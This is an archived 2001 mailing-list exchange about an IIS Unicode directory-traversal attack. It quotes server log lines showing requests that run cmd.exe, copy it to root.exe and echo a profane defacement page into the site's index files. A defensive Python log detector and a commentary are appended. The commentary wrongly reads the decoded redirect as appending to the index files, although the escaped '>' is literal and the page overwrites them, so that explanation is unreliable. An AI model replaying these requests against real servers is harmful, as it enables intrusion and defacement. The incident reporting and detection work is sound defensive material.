Security Incidents: RE: who's owning this ip?

RE: who's owning this ip?

From: Matt Rowley <matt.rowley_at_streampipe.com>
Date: Mon, 14 May 2001 13:26:17 -0400

http://www.arin.net/cgi-bin/whois.pl
to reverse-lookup the IP for the coordinator.

--Matt

> -----Original Message-----
> From: Incidents Mailing List [mailto:INCIDENTS_at_SECURITYFOCUS.COM]On
> Behalf Of Thomas Springer
> Sent: Tuesday, May 08, 2001 12:08 PM
> To: INCIDENTS_at_SECURITYFOCUS.COM
> Subject: who's owning this ip?
>
>
> We had an attacker exploiting Unicode on IIS 5 yesterday - see the funny
> Chinese-war pages in the log below. The hacker successfully exploited the
> IIS Unicode bug, created ~100 files but was still too dumb to deface the
> webserver.
>
> The attacker used 208.22.161.15 and 202.97.205.3.
> I tried a trace but ended up with
> ...
> 19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [
> 20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [
> 21 200 ms 211 ms 220 ms 202.0.170.34
> 22 361 ms 370 ms 411 ms 202.0.170.13
> 23 370 ms 391 ms 400 ms 202.97.10.193
> 24 521 ms 541 ms 551 ms 202.97.10.66
> 25 581 ms 601 ms 581 ms 61.138.38.2
> 26 721 ms 711 ms 671 ms 61.180.139.202
> 27 341 ms 350 ms 351 ms 202.97.205.3
>
> 208.22.161.15 seems to end at
> 17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net
> [205.171.17.130]
> 18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net
> [205.171.17.82]
> 19 * * * Timeout..
> ....
>
> Any chance of finding out to whom the two IP addresses belong?
> Any tool that copies cmd.exe to root.exe?
>
> I liked this hack, because nothing happened and people here suddenly
> develop security awareness. Hence, even the servers I begged to secure
> for weeks are patched now.
> BTW it's a German website - nothing to do with the
> Chinese-American spy wars.
>
> funny hackerworld...
>
> thomas
>
> --- IIS-Logsnip ---
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</html^>>.././index.asp 502 355 423 - - -
> 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</html^>>.././index.htm 502 355 423 - - -
>
>
> Thomas Springer
Received on May 14 2001
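Added example, not code from the post, from IIS or from any tool mentioned in the thread: a small detector that answers the "any tool that copies cmd.exe to root.exe?" question by running the checks a responder would want over the quoted IIS log lines. It flags traversal to cmd.exe, the copy that stages a renamed shell, requests that invoke that renamed shell, and echo redirects that write files, and it decodes the URL-encoded, caret-escaped query so the defacement text is readable. The W3C field layout, the short list of encodings checked on the raw URI (the overlong UTF-8 forms of MS00-078 and the double-decode forms of MS01-026), and the names parse, decode_cmd, analyse and scan are this example's own assumptions; the sample log is the post's five lines rejoined onto single lines.

```python
import re
from urllib.parse import unquote_plus

# Assumed field layout: the W3C extended format the quoted snippet appears to use.
FIELDS = ("date time c-ip cs-username s-ip s-port cs-method cs-uri-stem "
          "cs-uri-query sc-status sc-bytes cs-bytes cs-version cs-user-agent "
          "cs-referer").split()

# Encodings IIS turned into a path separator only after its traversal check:
# overlong UTF-8 (MS00-078) and double decoding (MS01-026).  Checked on the raw
# stem, because a log that already shows "../.." no longer says which form the
# attacker sent.  Assumed, non-exhaustive list.
SUSPECT_ENCODINGS = re.compile(r"%c0%af|%c1%9c|%25(?:5c|2f)|%%35c", re.I)

# The log lines from the post, rejoined onto single lines (not constructed).
SAMPLE_LOG = r"""
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</html^>>.././index.asp 502 355 423 - - -
2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</html^>>.././index.htm 502 355 423 - - -
"""


def parse(line):
    """Split one log line into a dict keyed by FIELDS; None if the shape is wrong."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None


def decode_cmd(query):
    """Recover the command line cmd.exe saw: URL-decode ('+' is a space) and
    drop the '^' characters cmd.exe uses to escape < > | and &."""
    return unquote_plus(query).replace("^", "")


def analyse(line):
    """Return a list of human-readable findings for one log line (empty = clean)."""
    rec = parse(line)
    if rec is None:
        return []
    stem, query = rec["cs-uri-stem"], rec["cs-uri-query"]
    encoded = SUSPECT_ENCODINGS.search(stem) is not None
    norm = unquote_plus(stem).replace("\\", "/").lower()
    exe = norm.rsplit("/", 1)[-1]
    cmd = decode_cmd(query)
    findings = []
    if encoded:
        findings.append("overlong or double-encoded path separator in raw URI")
    if ("/../" in norm or encoded) and exe == "cmd.exe":
        findings.append("directory traversal to cmd.exe")
    if exe == "cmd.exe" and re.search(r"\bcopy\b.*cmd\.exe", cmd, re.I):
        findings.append("cmd.exe copied to a new name (staging a renamed shell)")
    if exe.endswith(".exe") and exe != "cmd.exe" and cmd.startswith("/c "):
        findings.append("renamed cmd.exe invoked: " + exe)
    m = re.search(r"\becho\b.*>\s*(\S+)$", cmd, re.I)
    if m:
        findings.append("file written via echo redirect: " + m.group(1))
    return findings


def scan(log_text):
    """Return [(client ip, status, findings)] for every line that trips a rule."""
    hits = []
    for line in log_text.strip().splitlines():
        findings = analyse(line)
        if findings:
            rec = parse(line)
            hits.append((rec["c-ip"], rec["sc-status"], findings))
    return hits


if __name__ == "__main__":
    for ip, status, findings in scan(SAMPLE_LOG):
        print(ip, status, "; ".join(findings))
    # Show what the attacker actually tried to write into index.asp.
    print(decode_cmd(parse(SAMPLE_LOG.strip().splitlines()[3])["cs-uri-query"]))
```

Two points worth noticing when reading the output: the later requests hit /scripts/root.exe directly, which shows the copy worked regardless of the status code logged for the copy request itself, and the decoded echo command ends in `>>.././index.asp`, i.e. the page body was appended to the site's index files rather than replacing them. Because the quoted log already shows the decoded `../..`, the encoding rule only fires on lines that still carry a raw `%c0%af`-style sequence; the traversal rule accepts either form.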
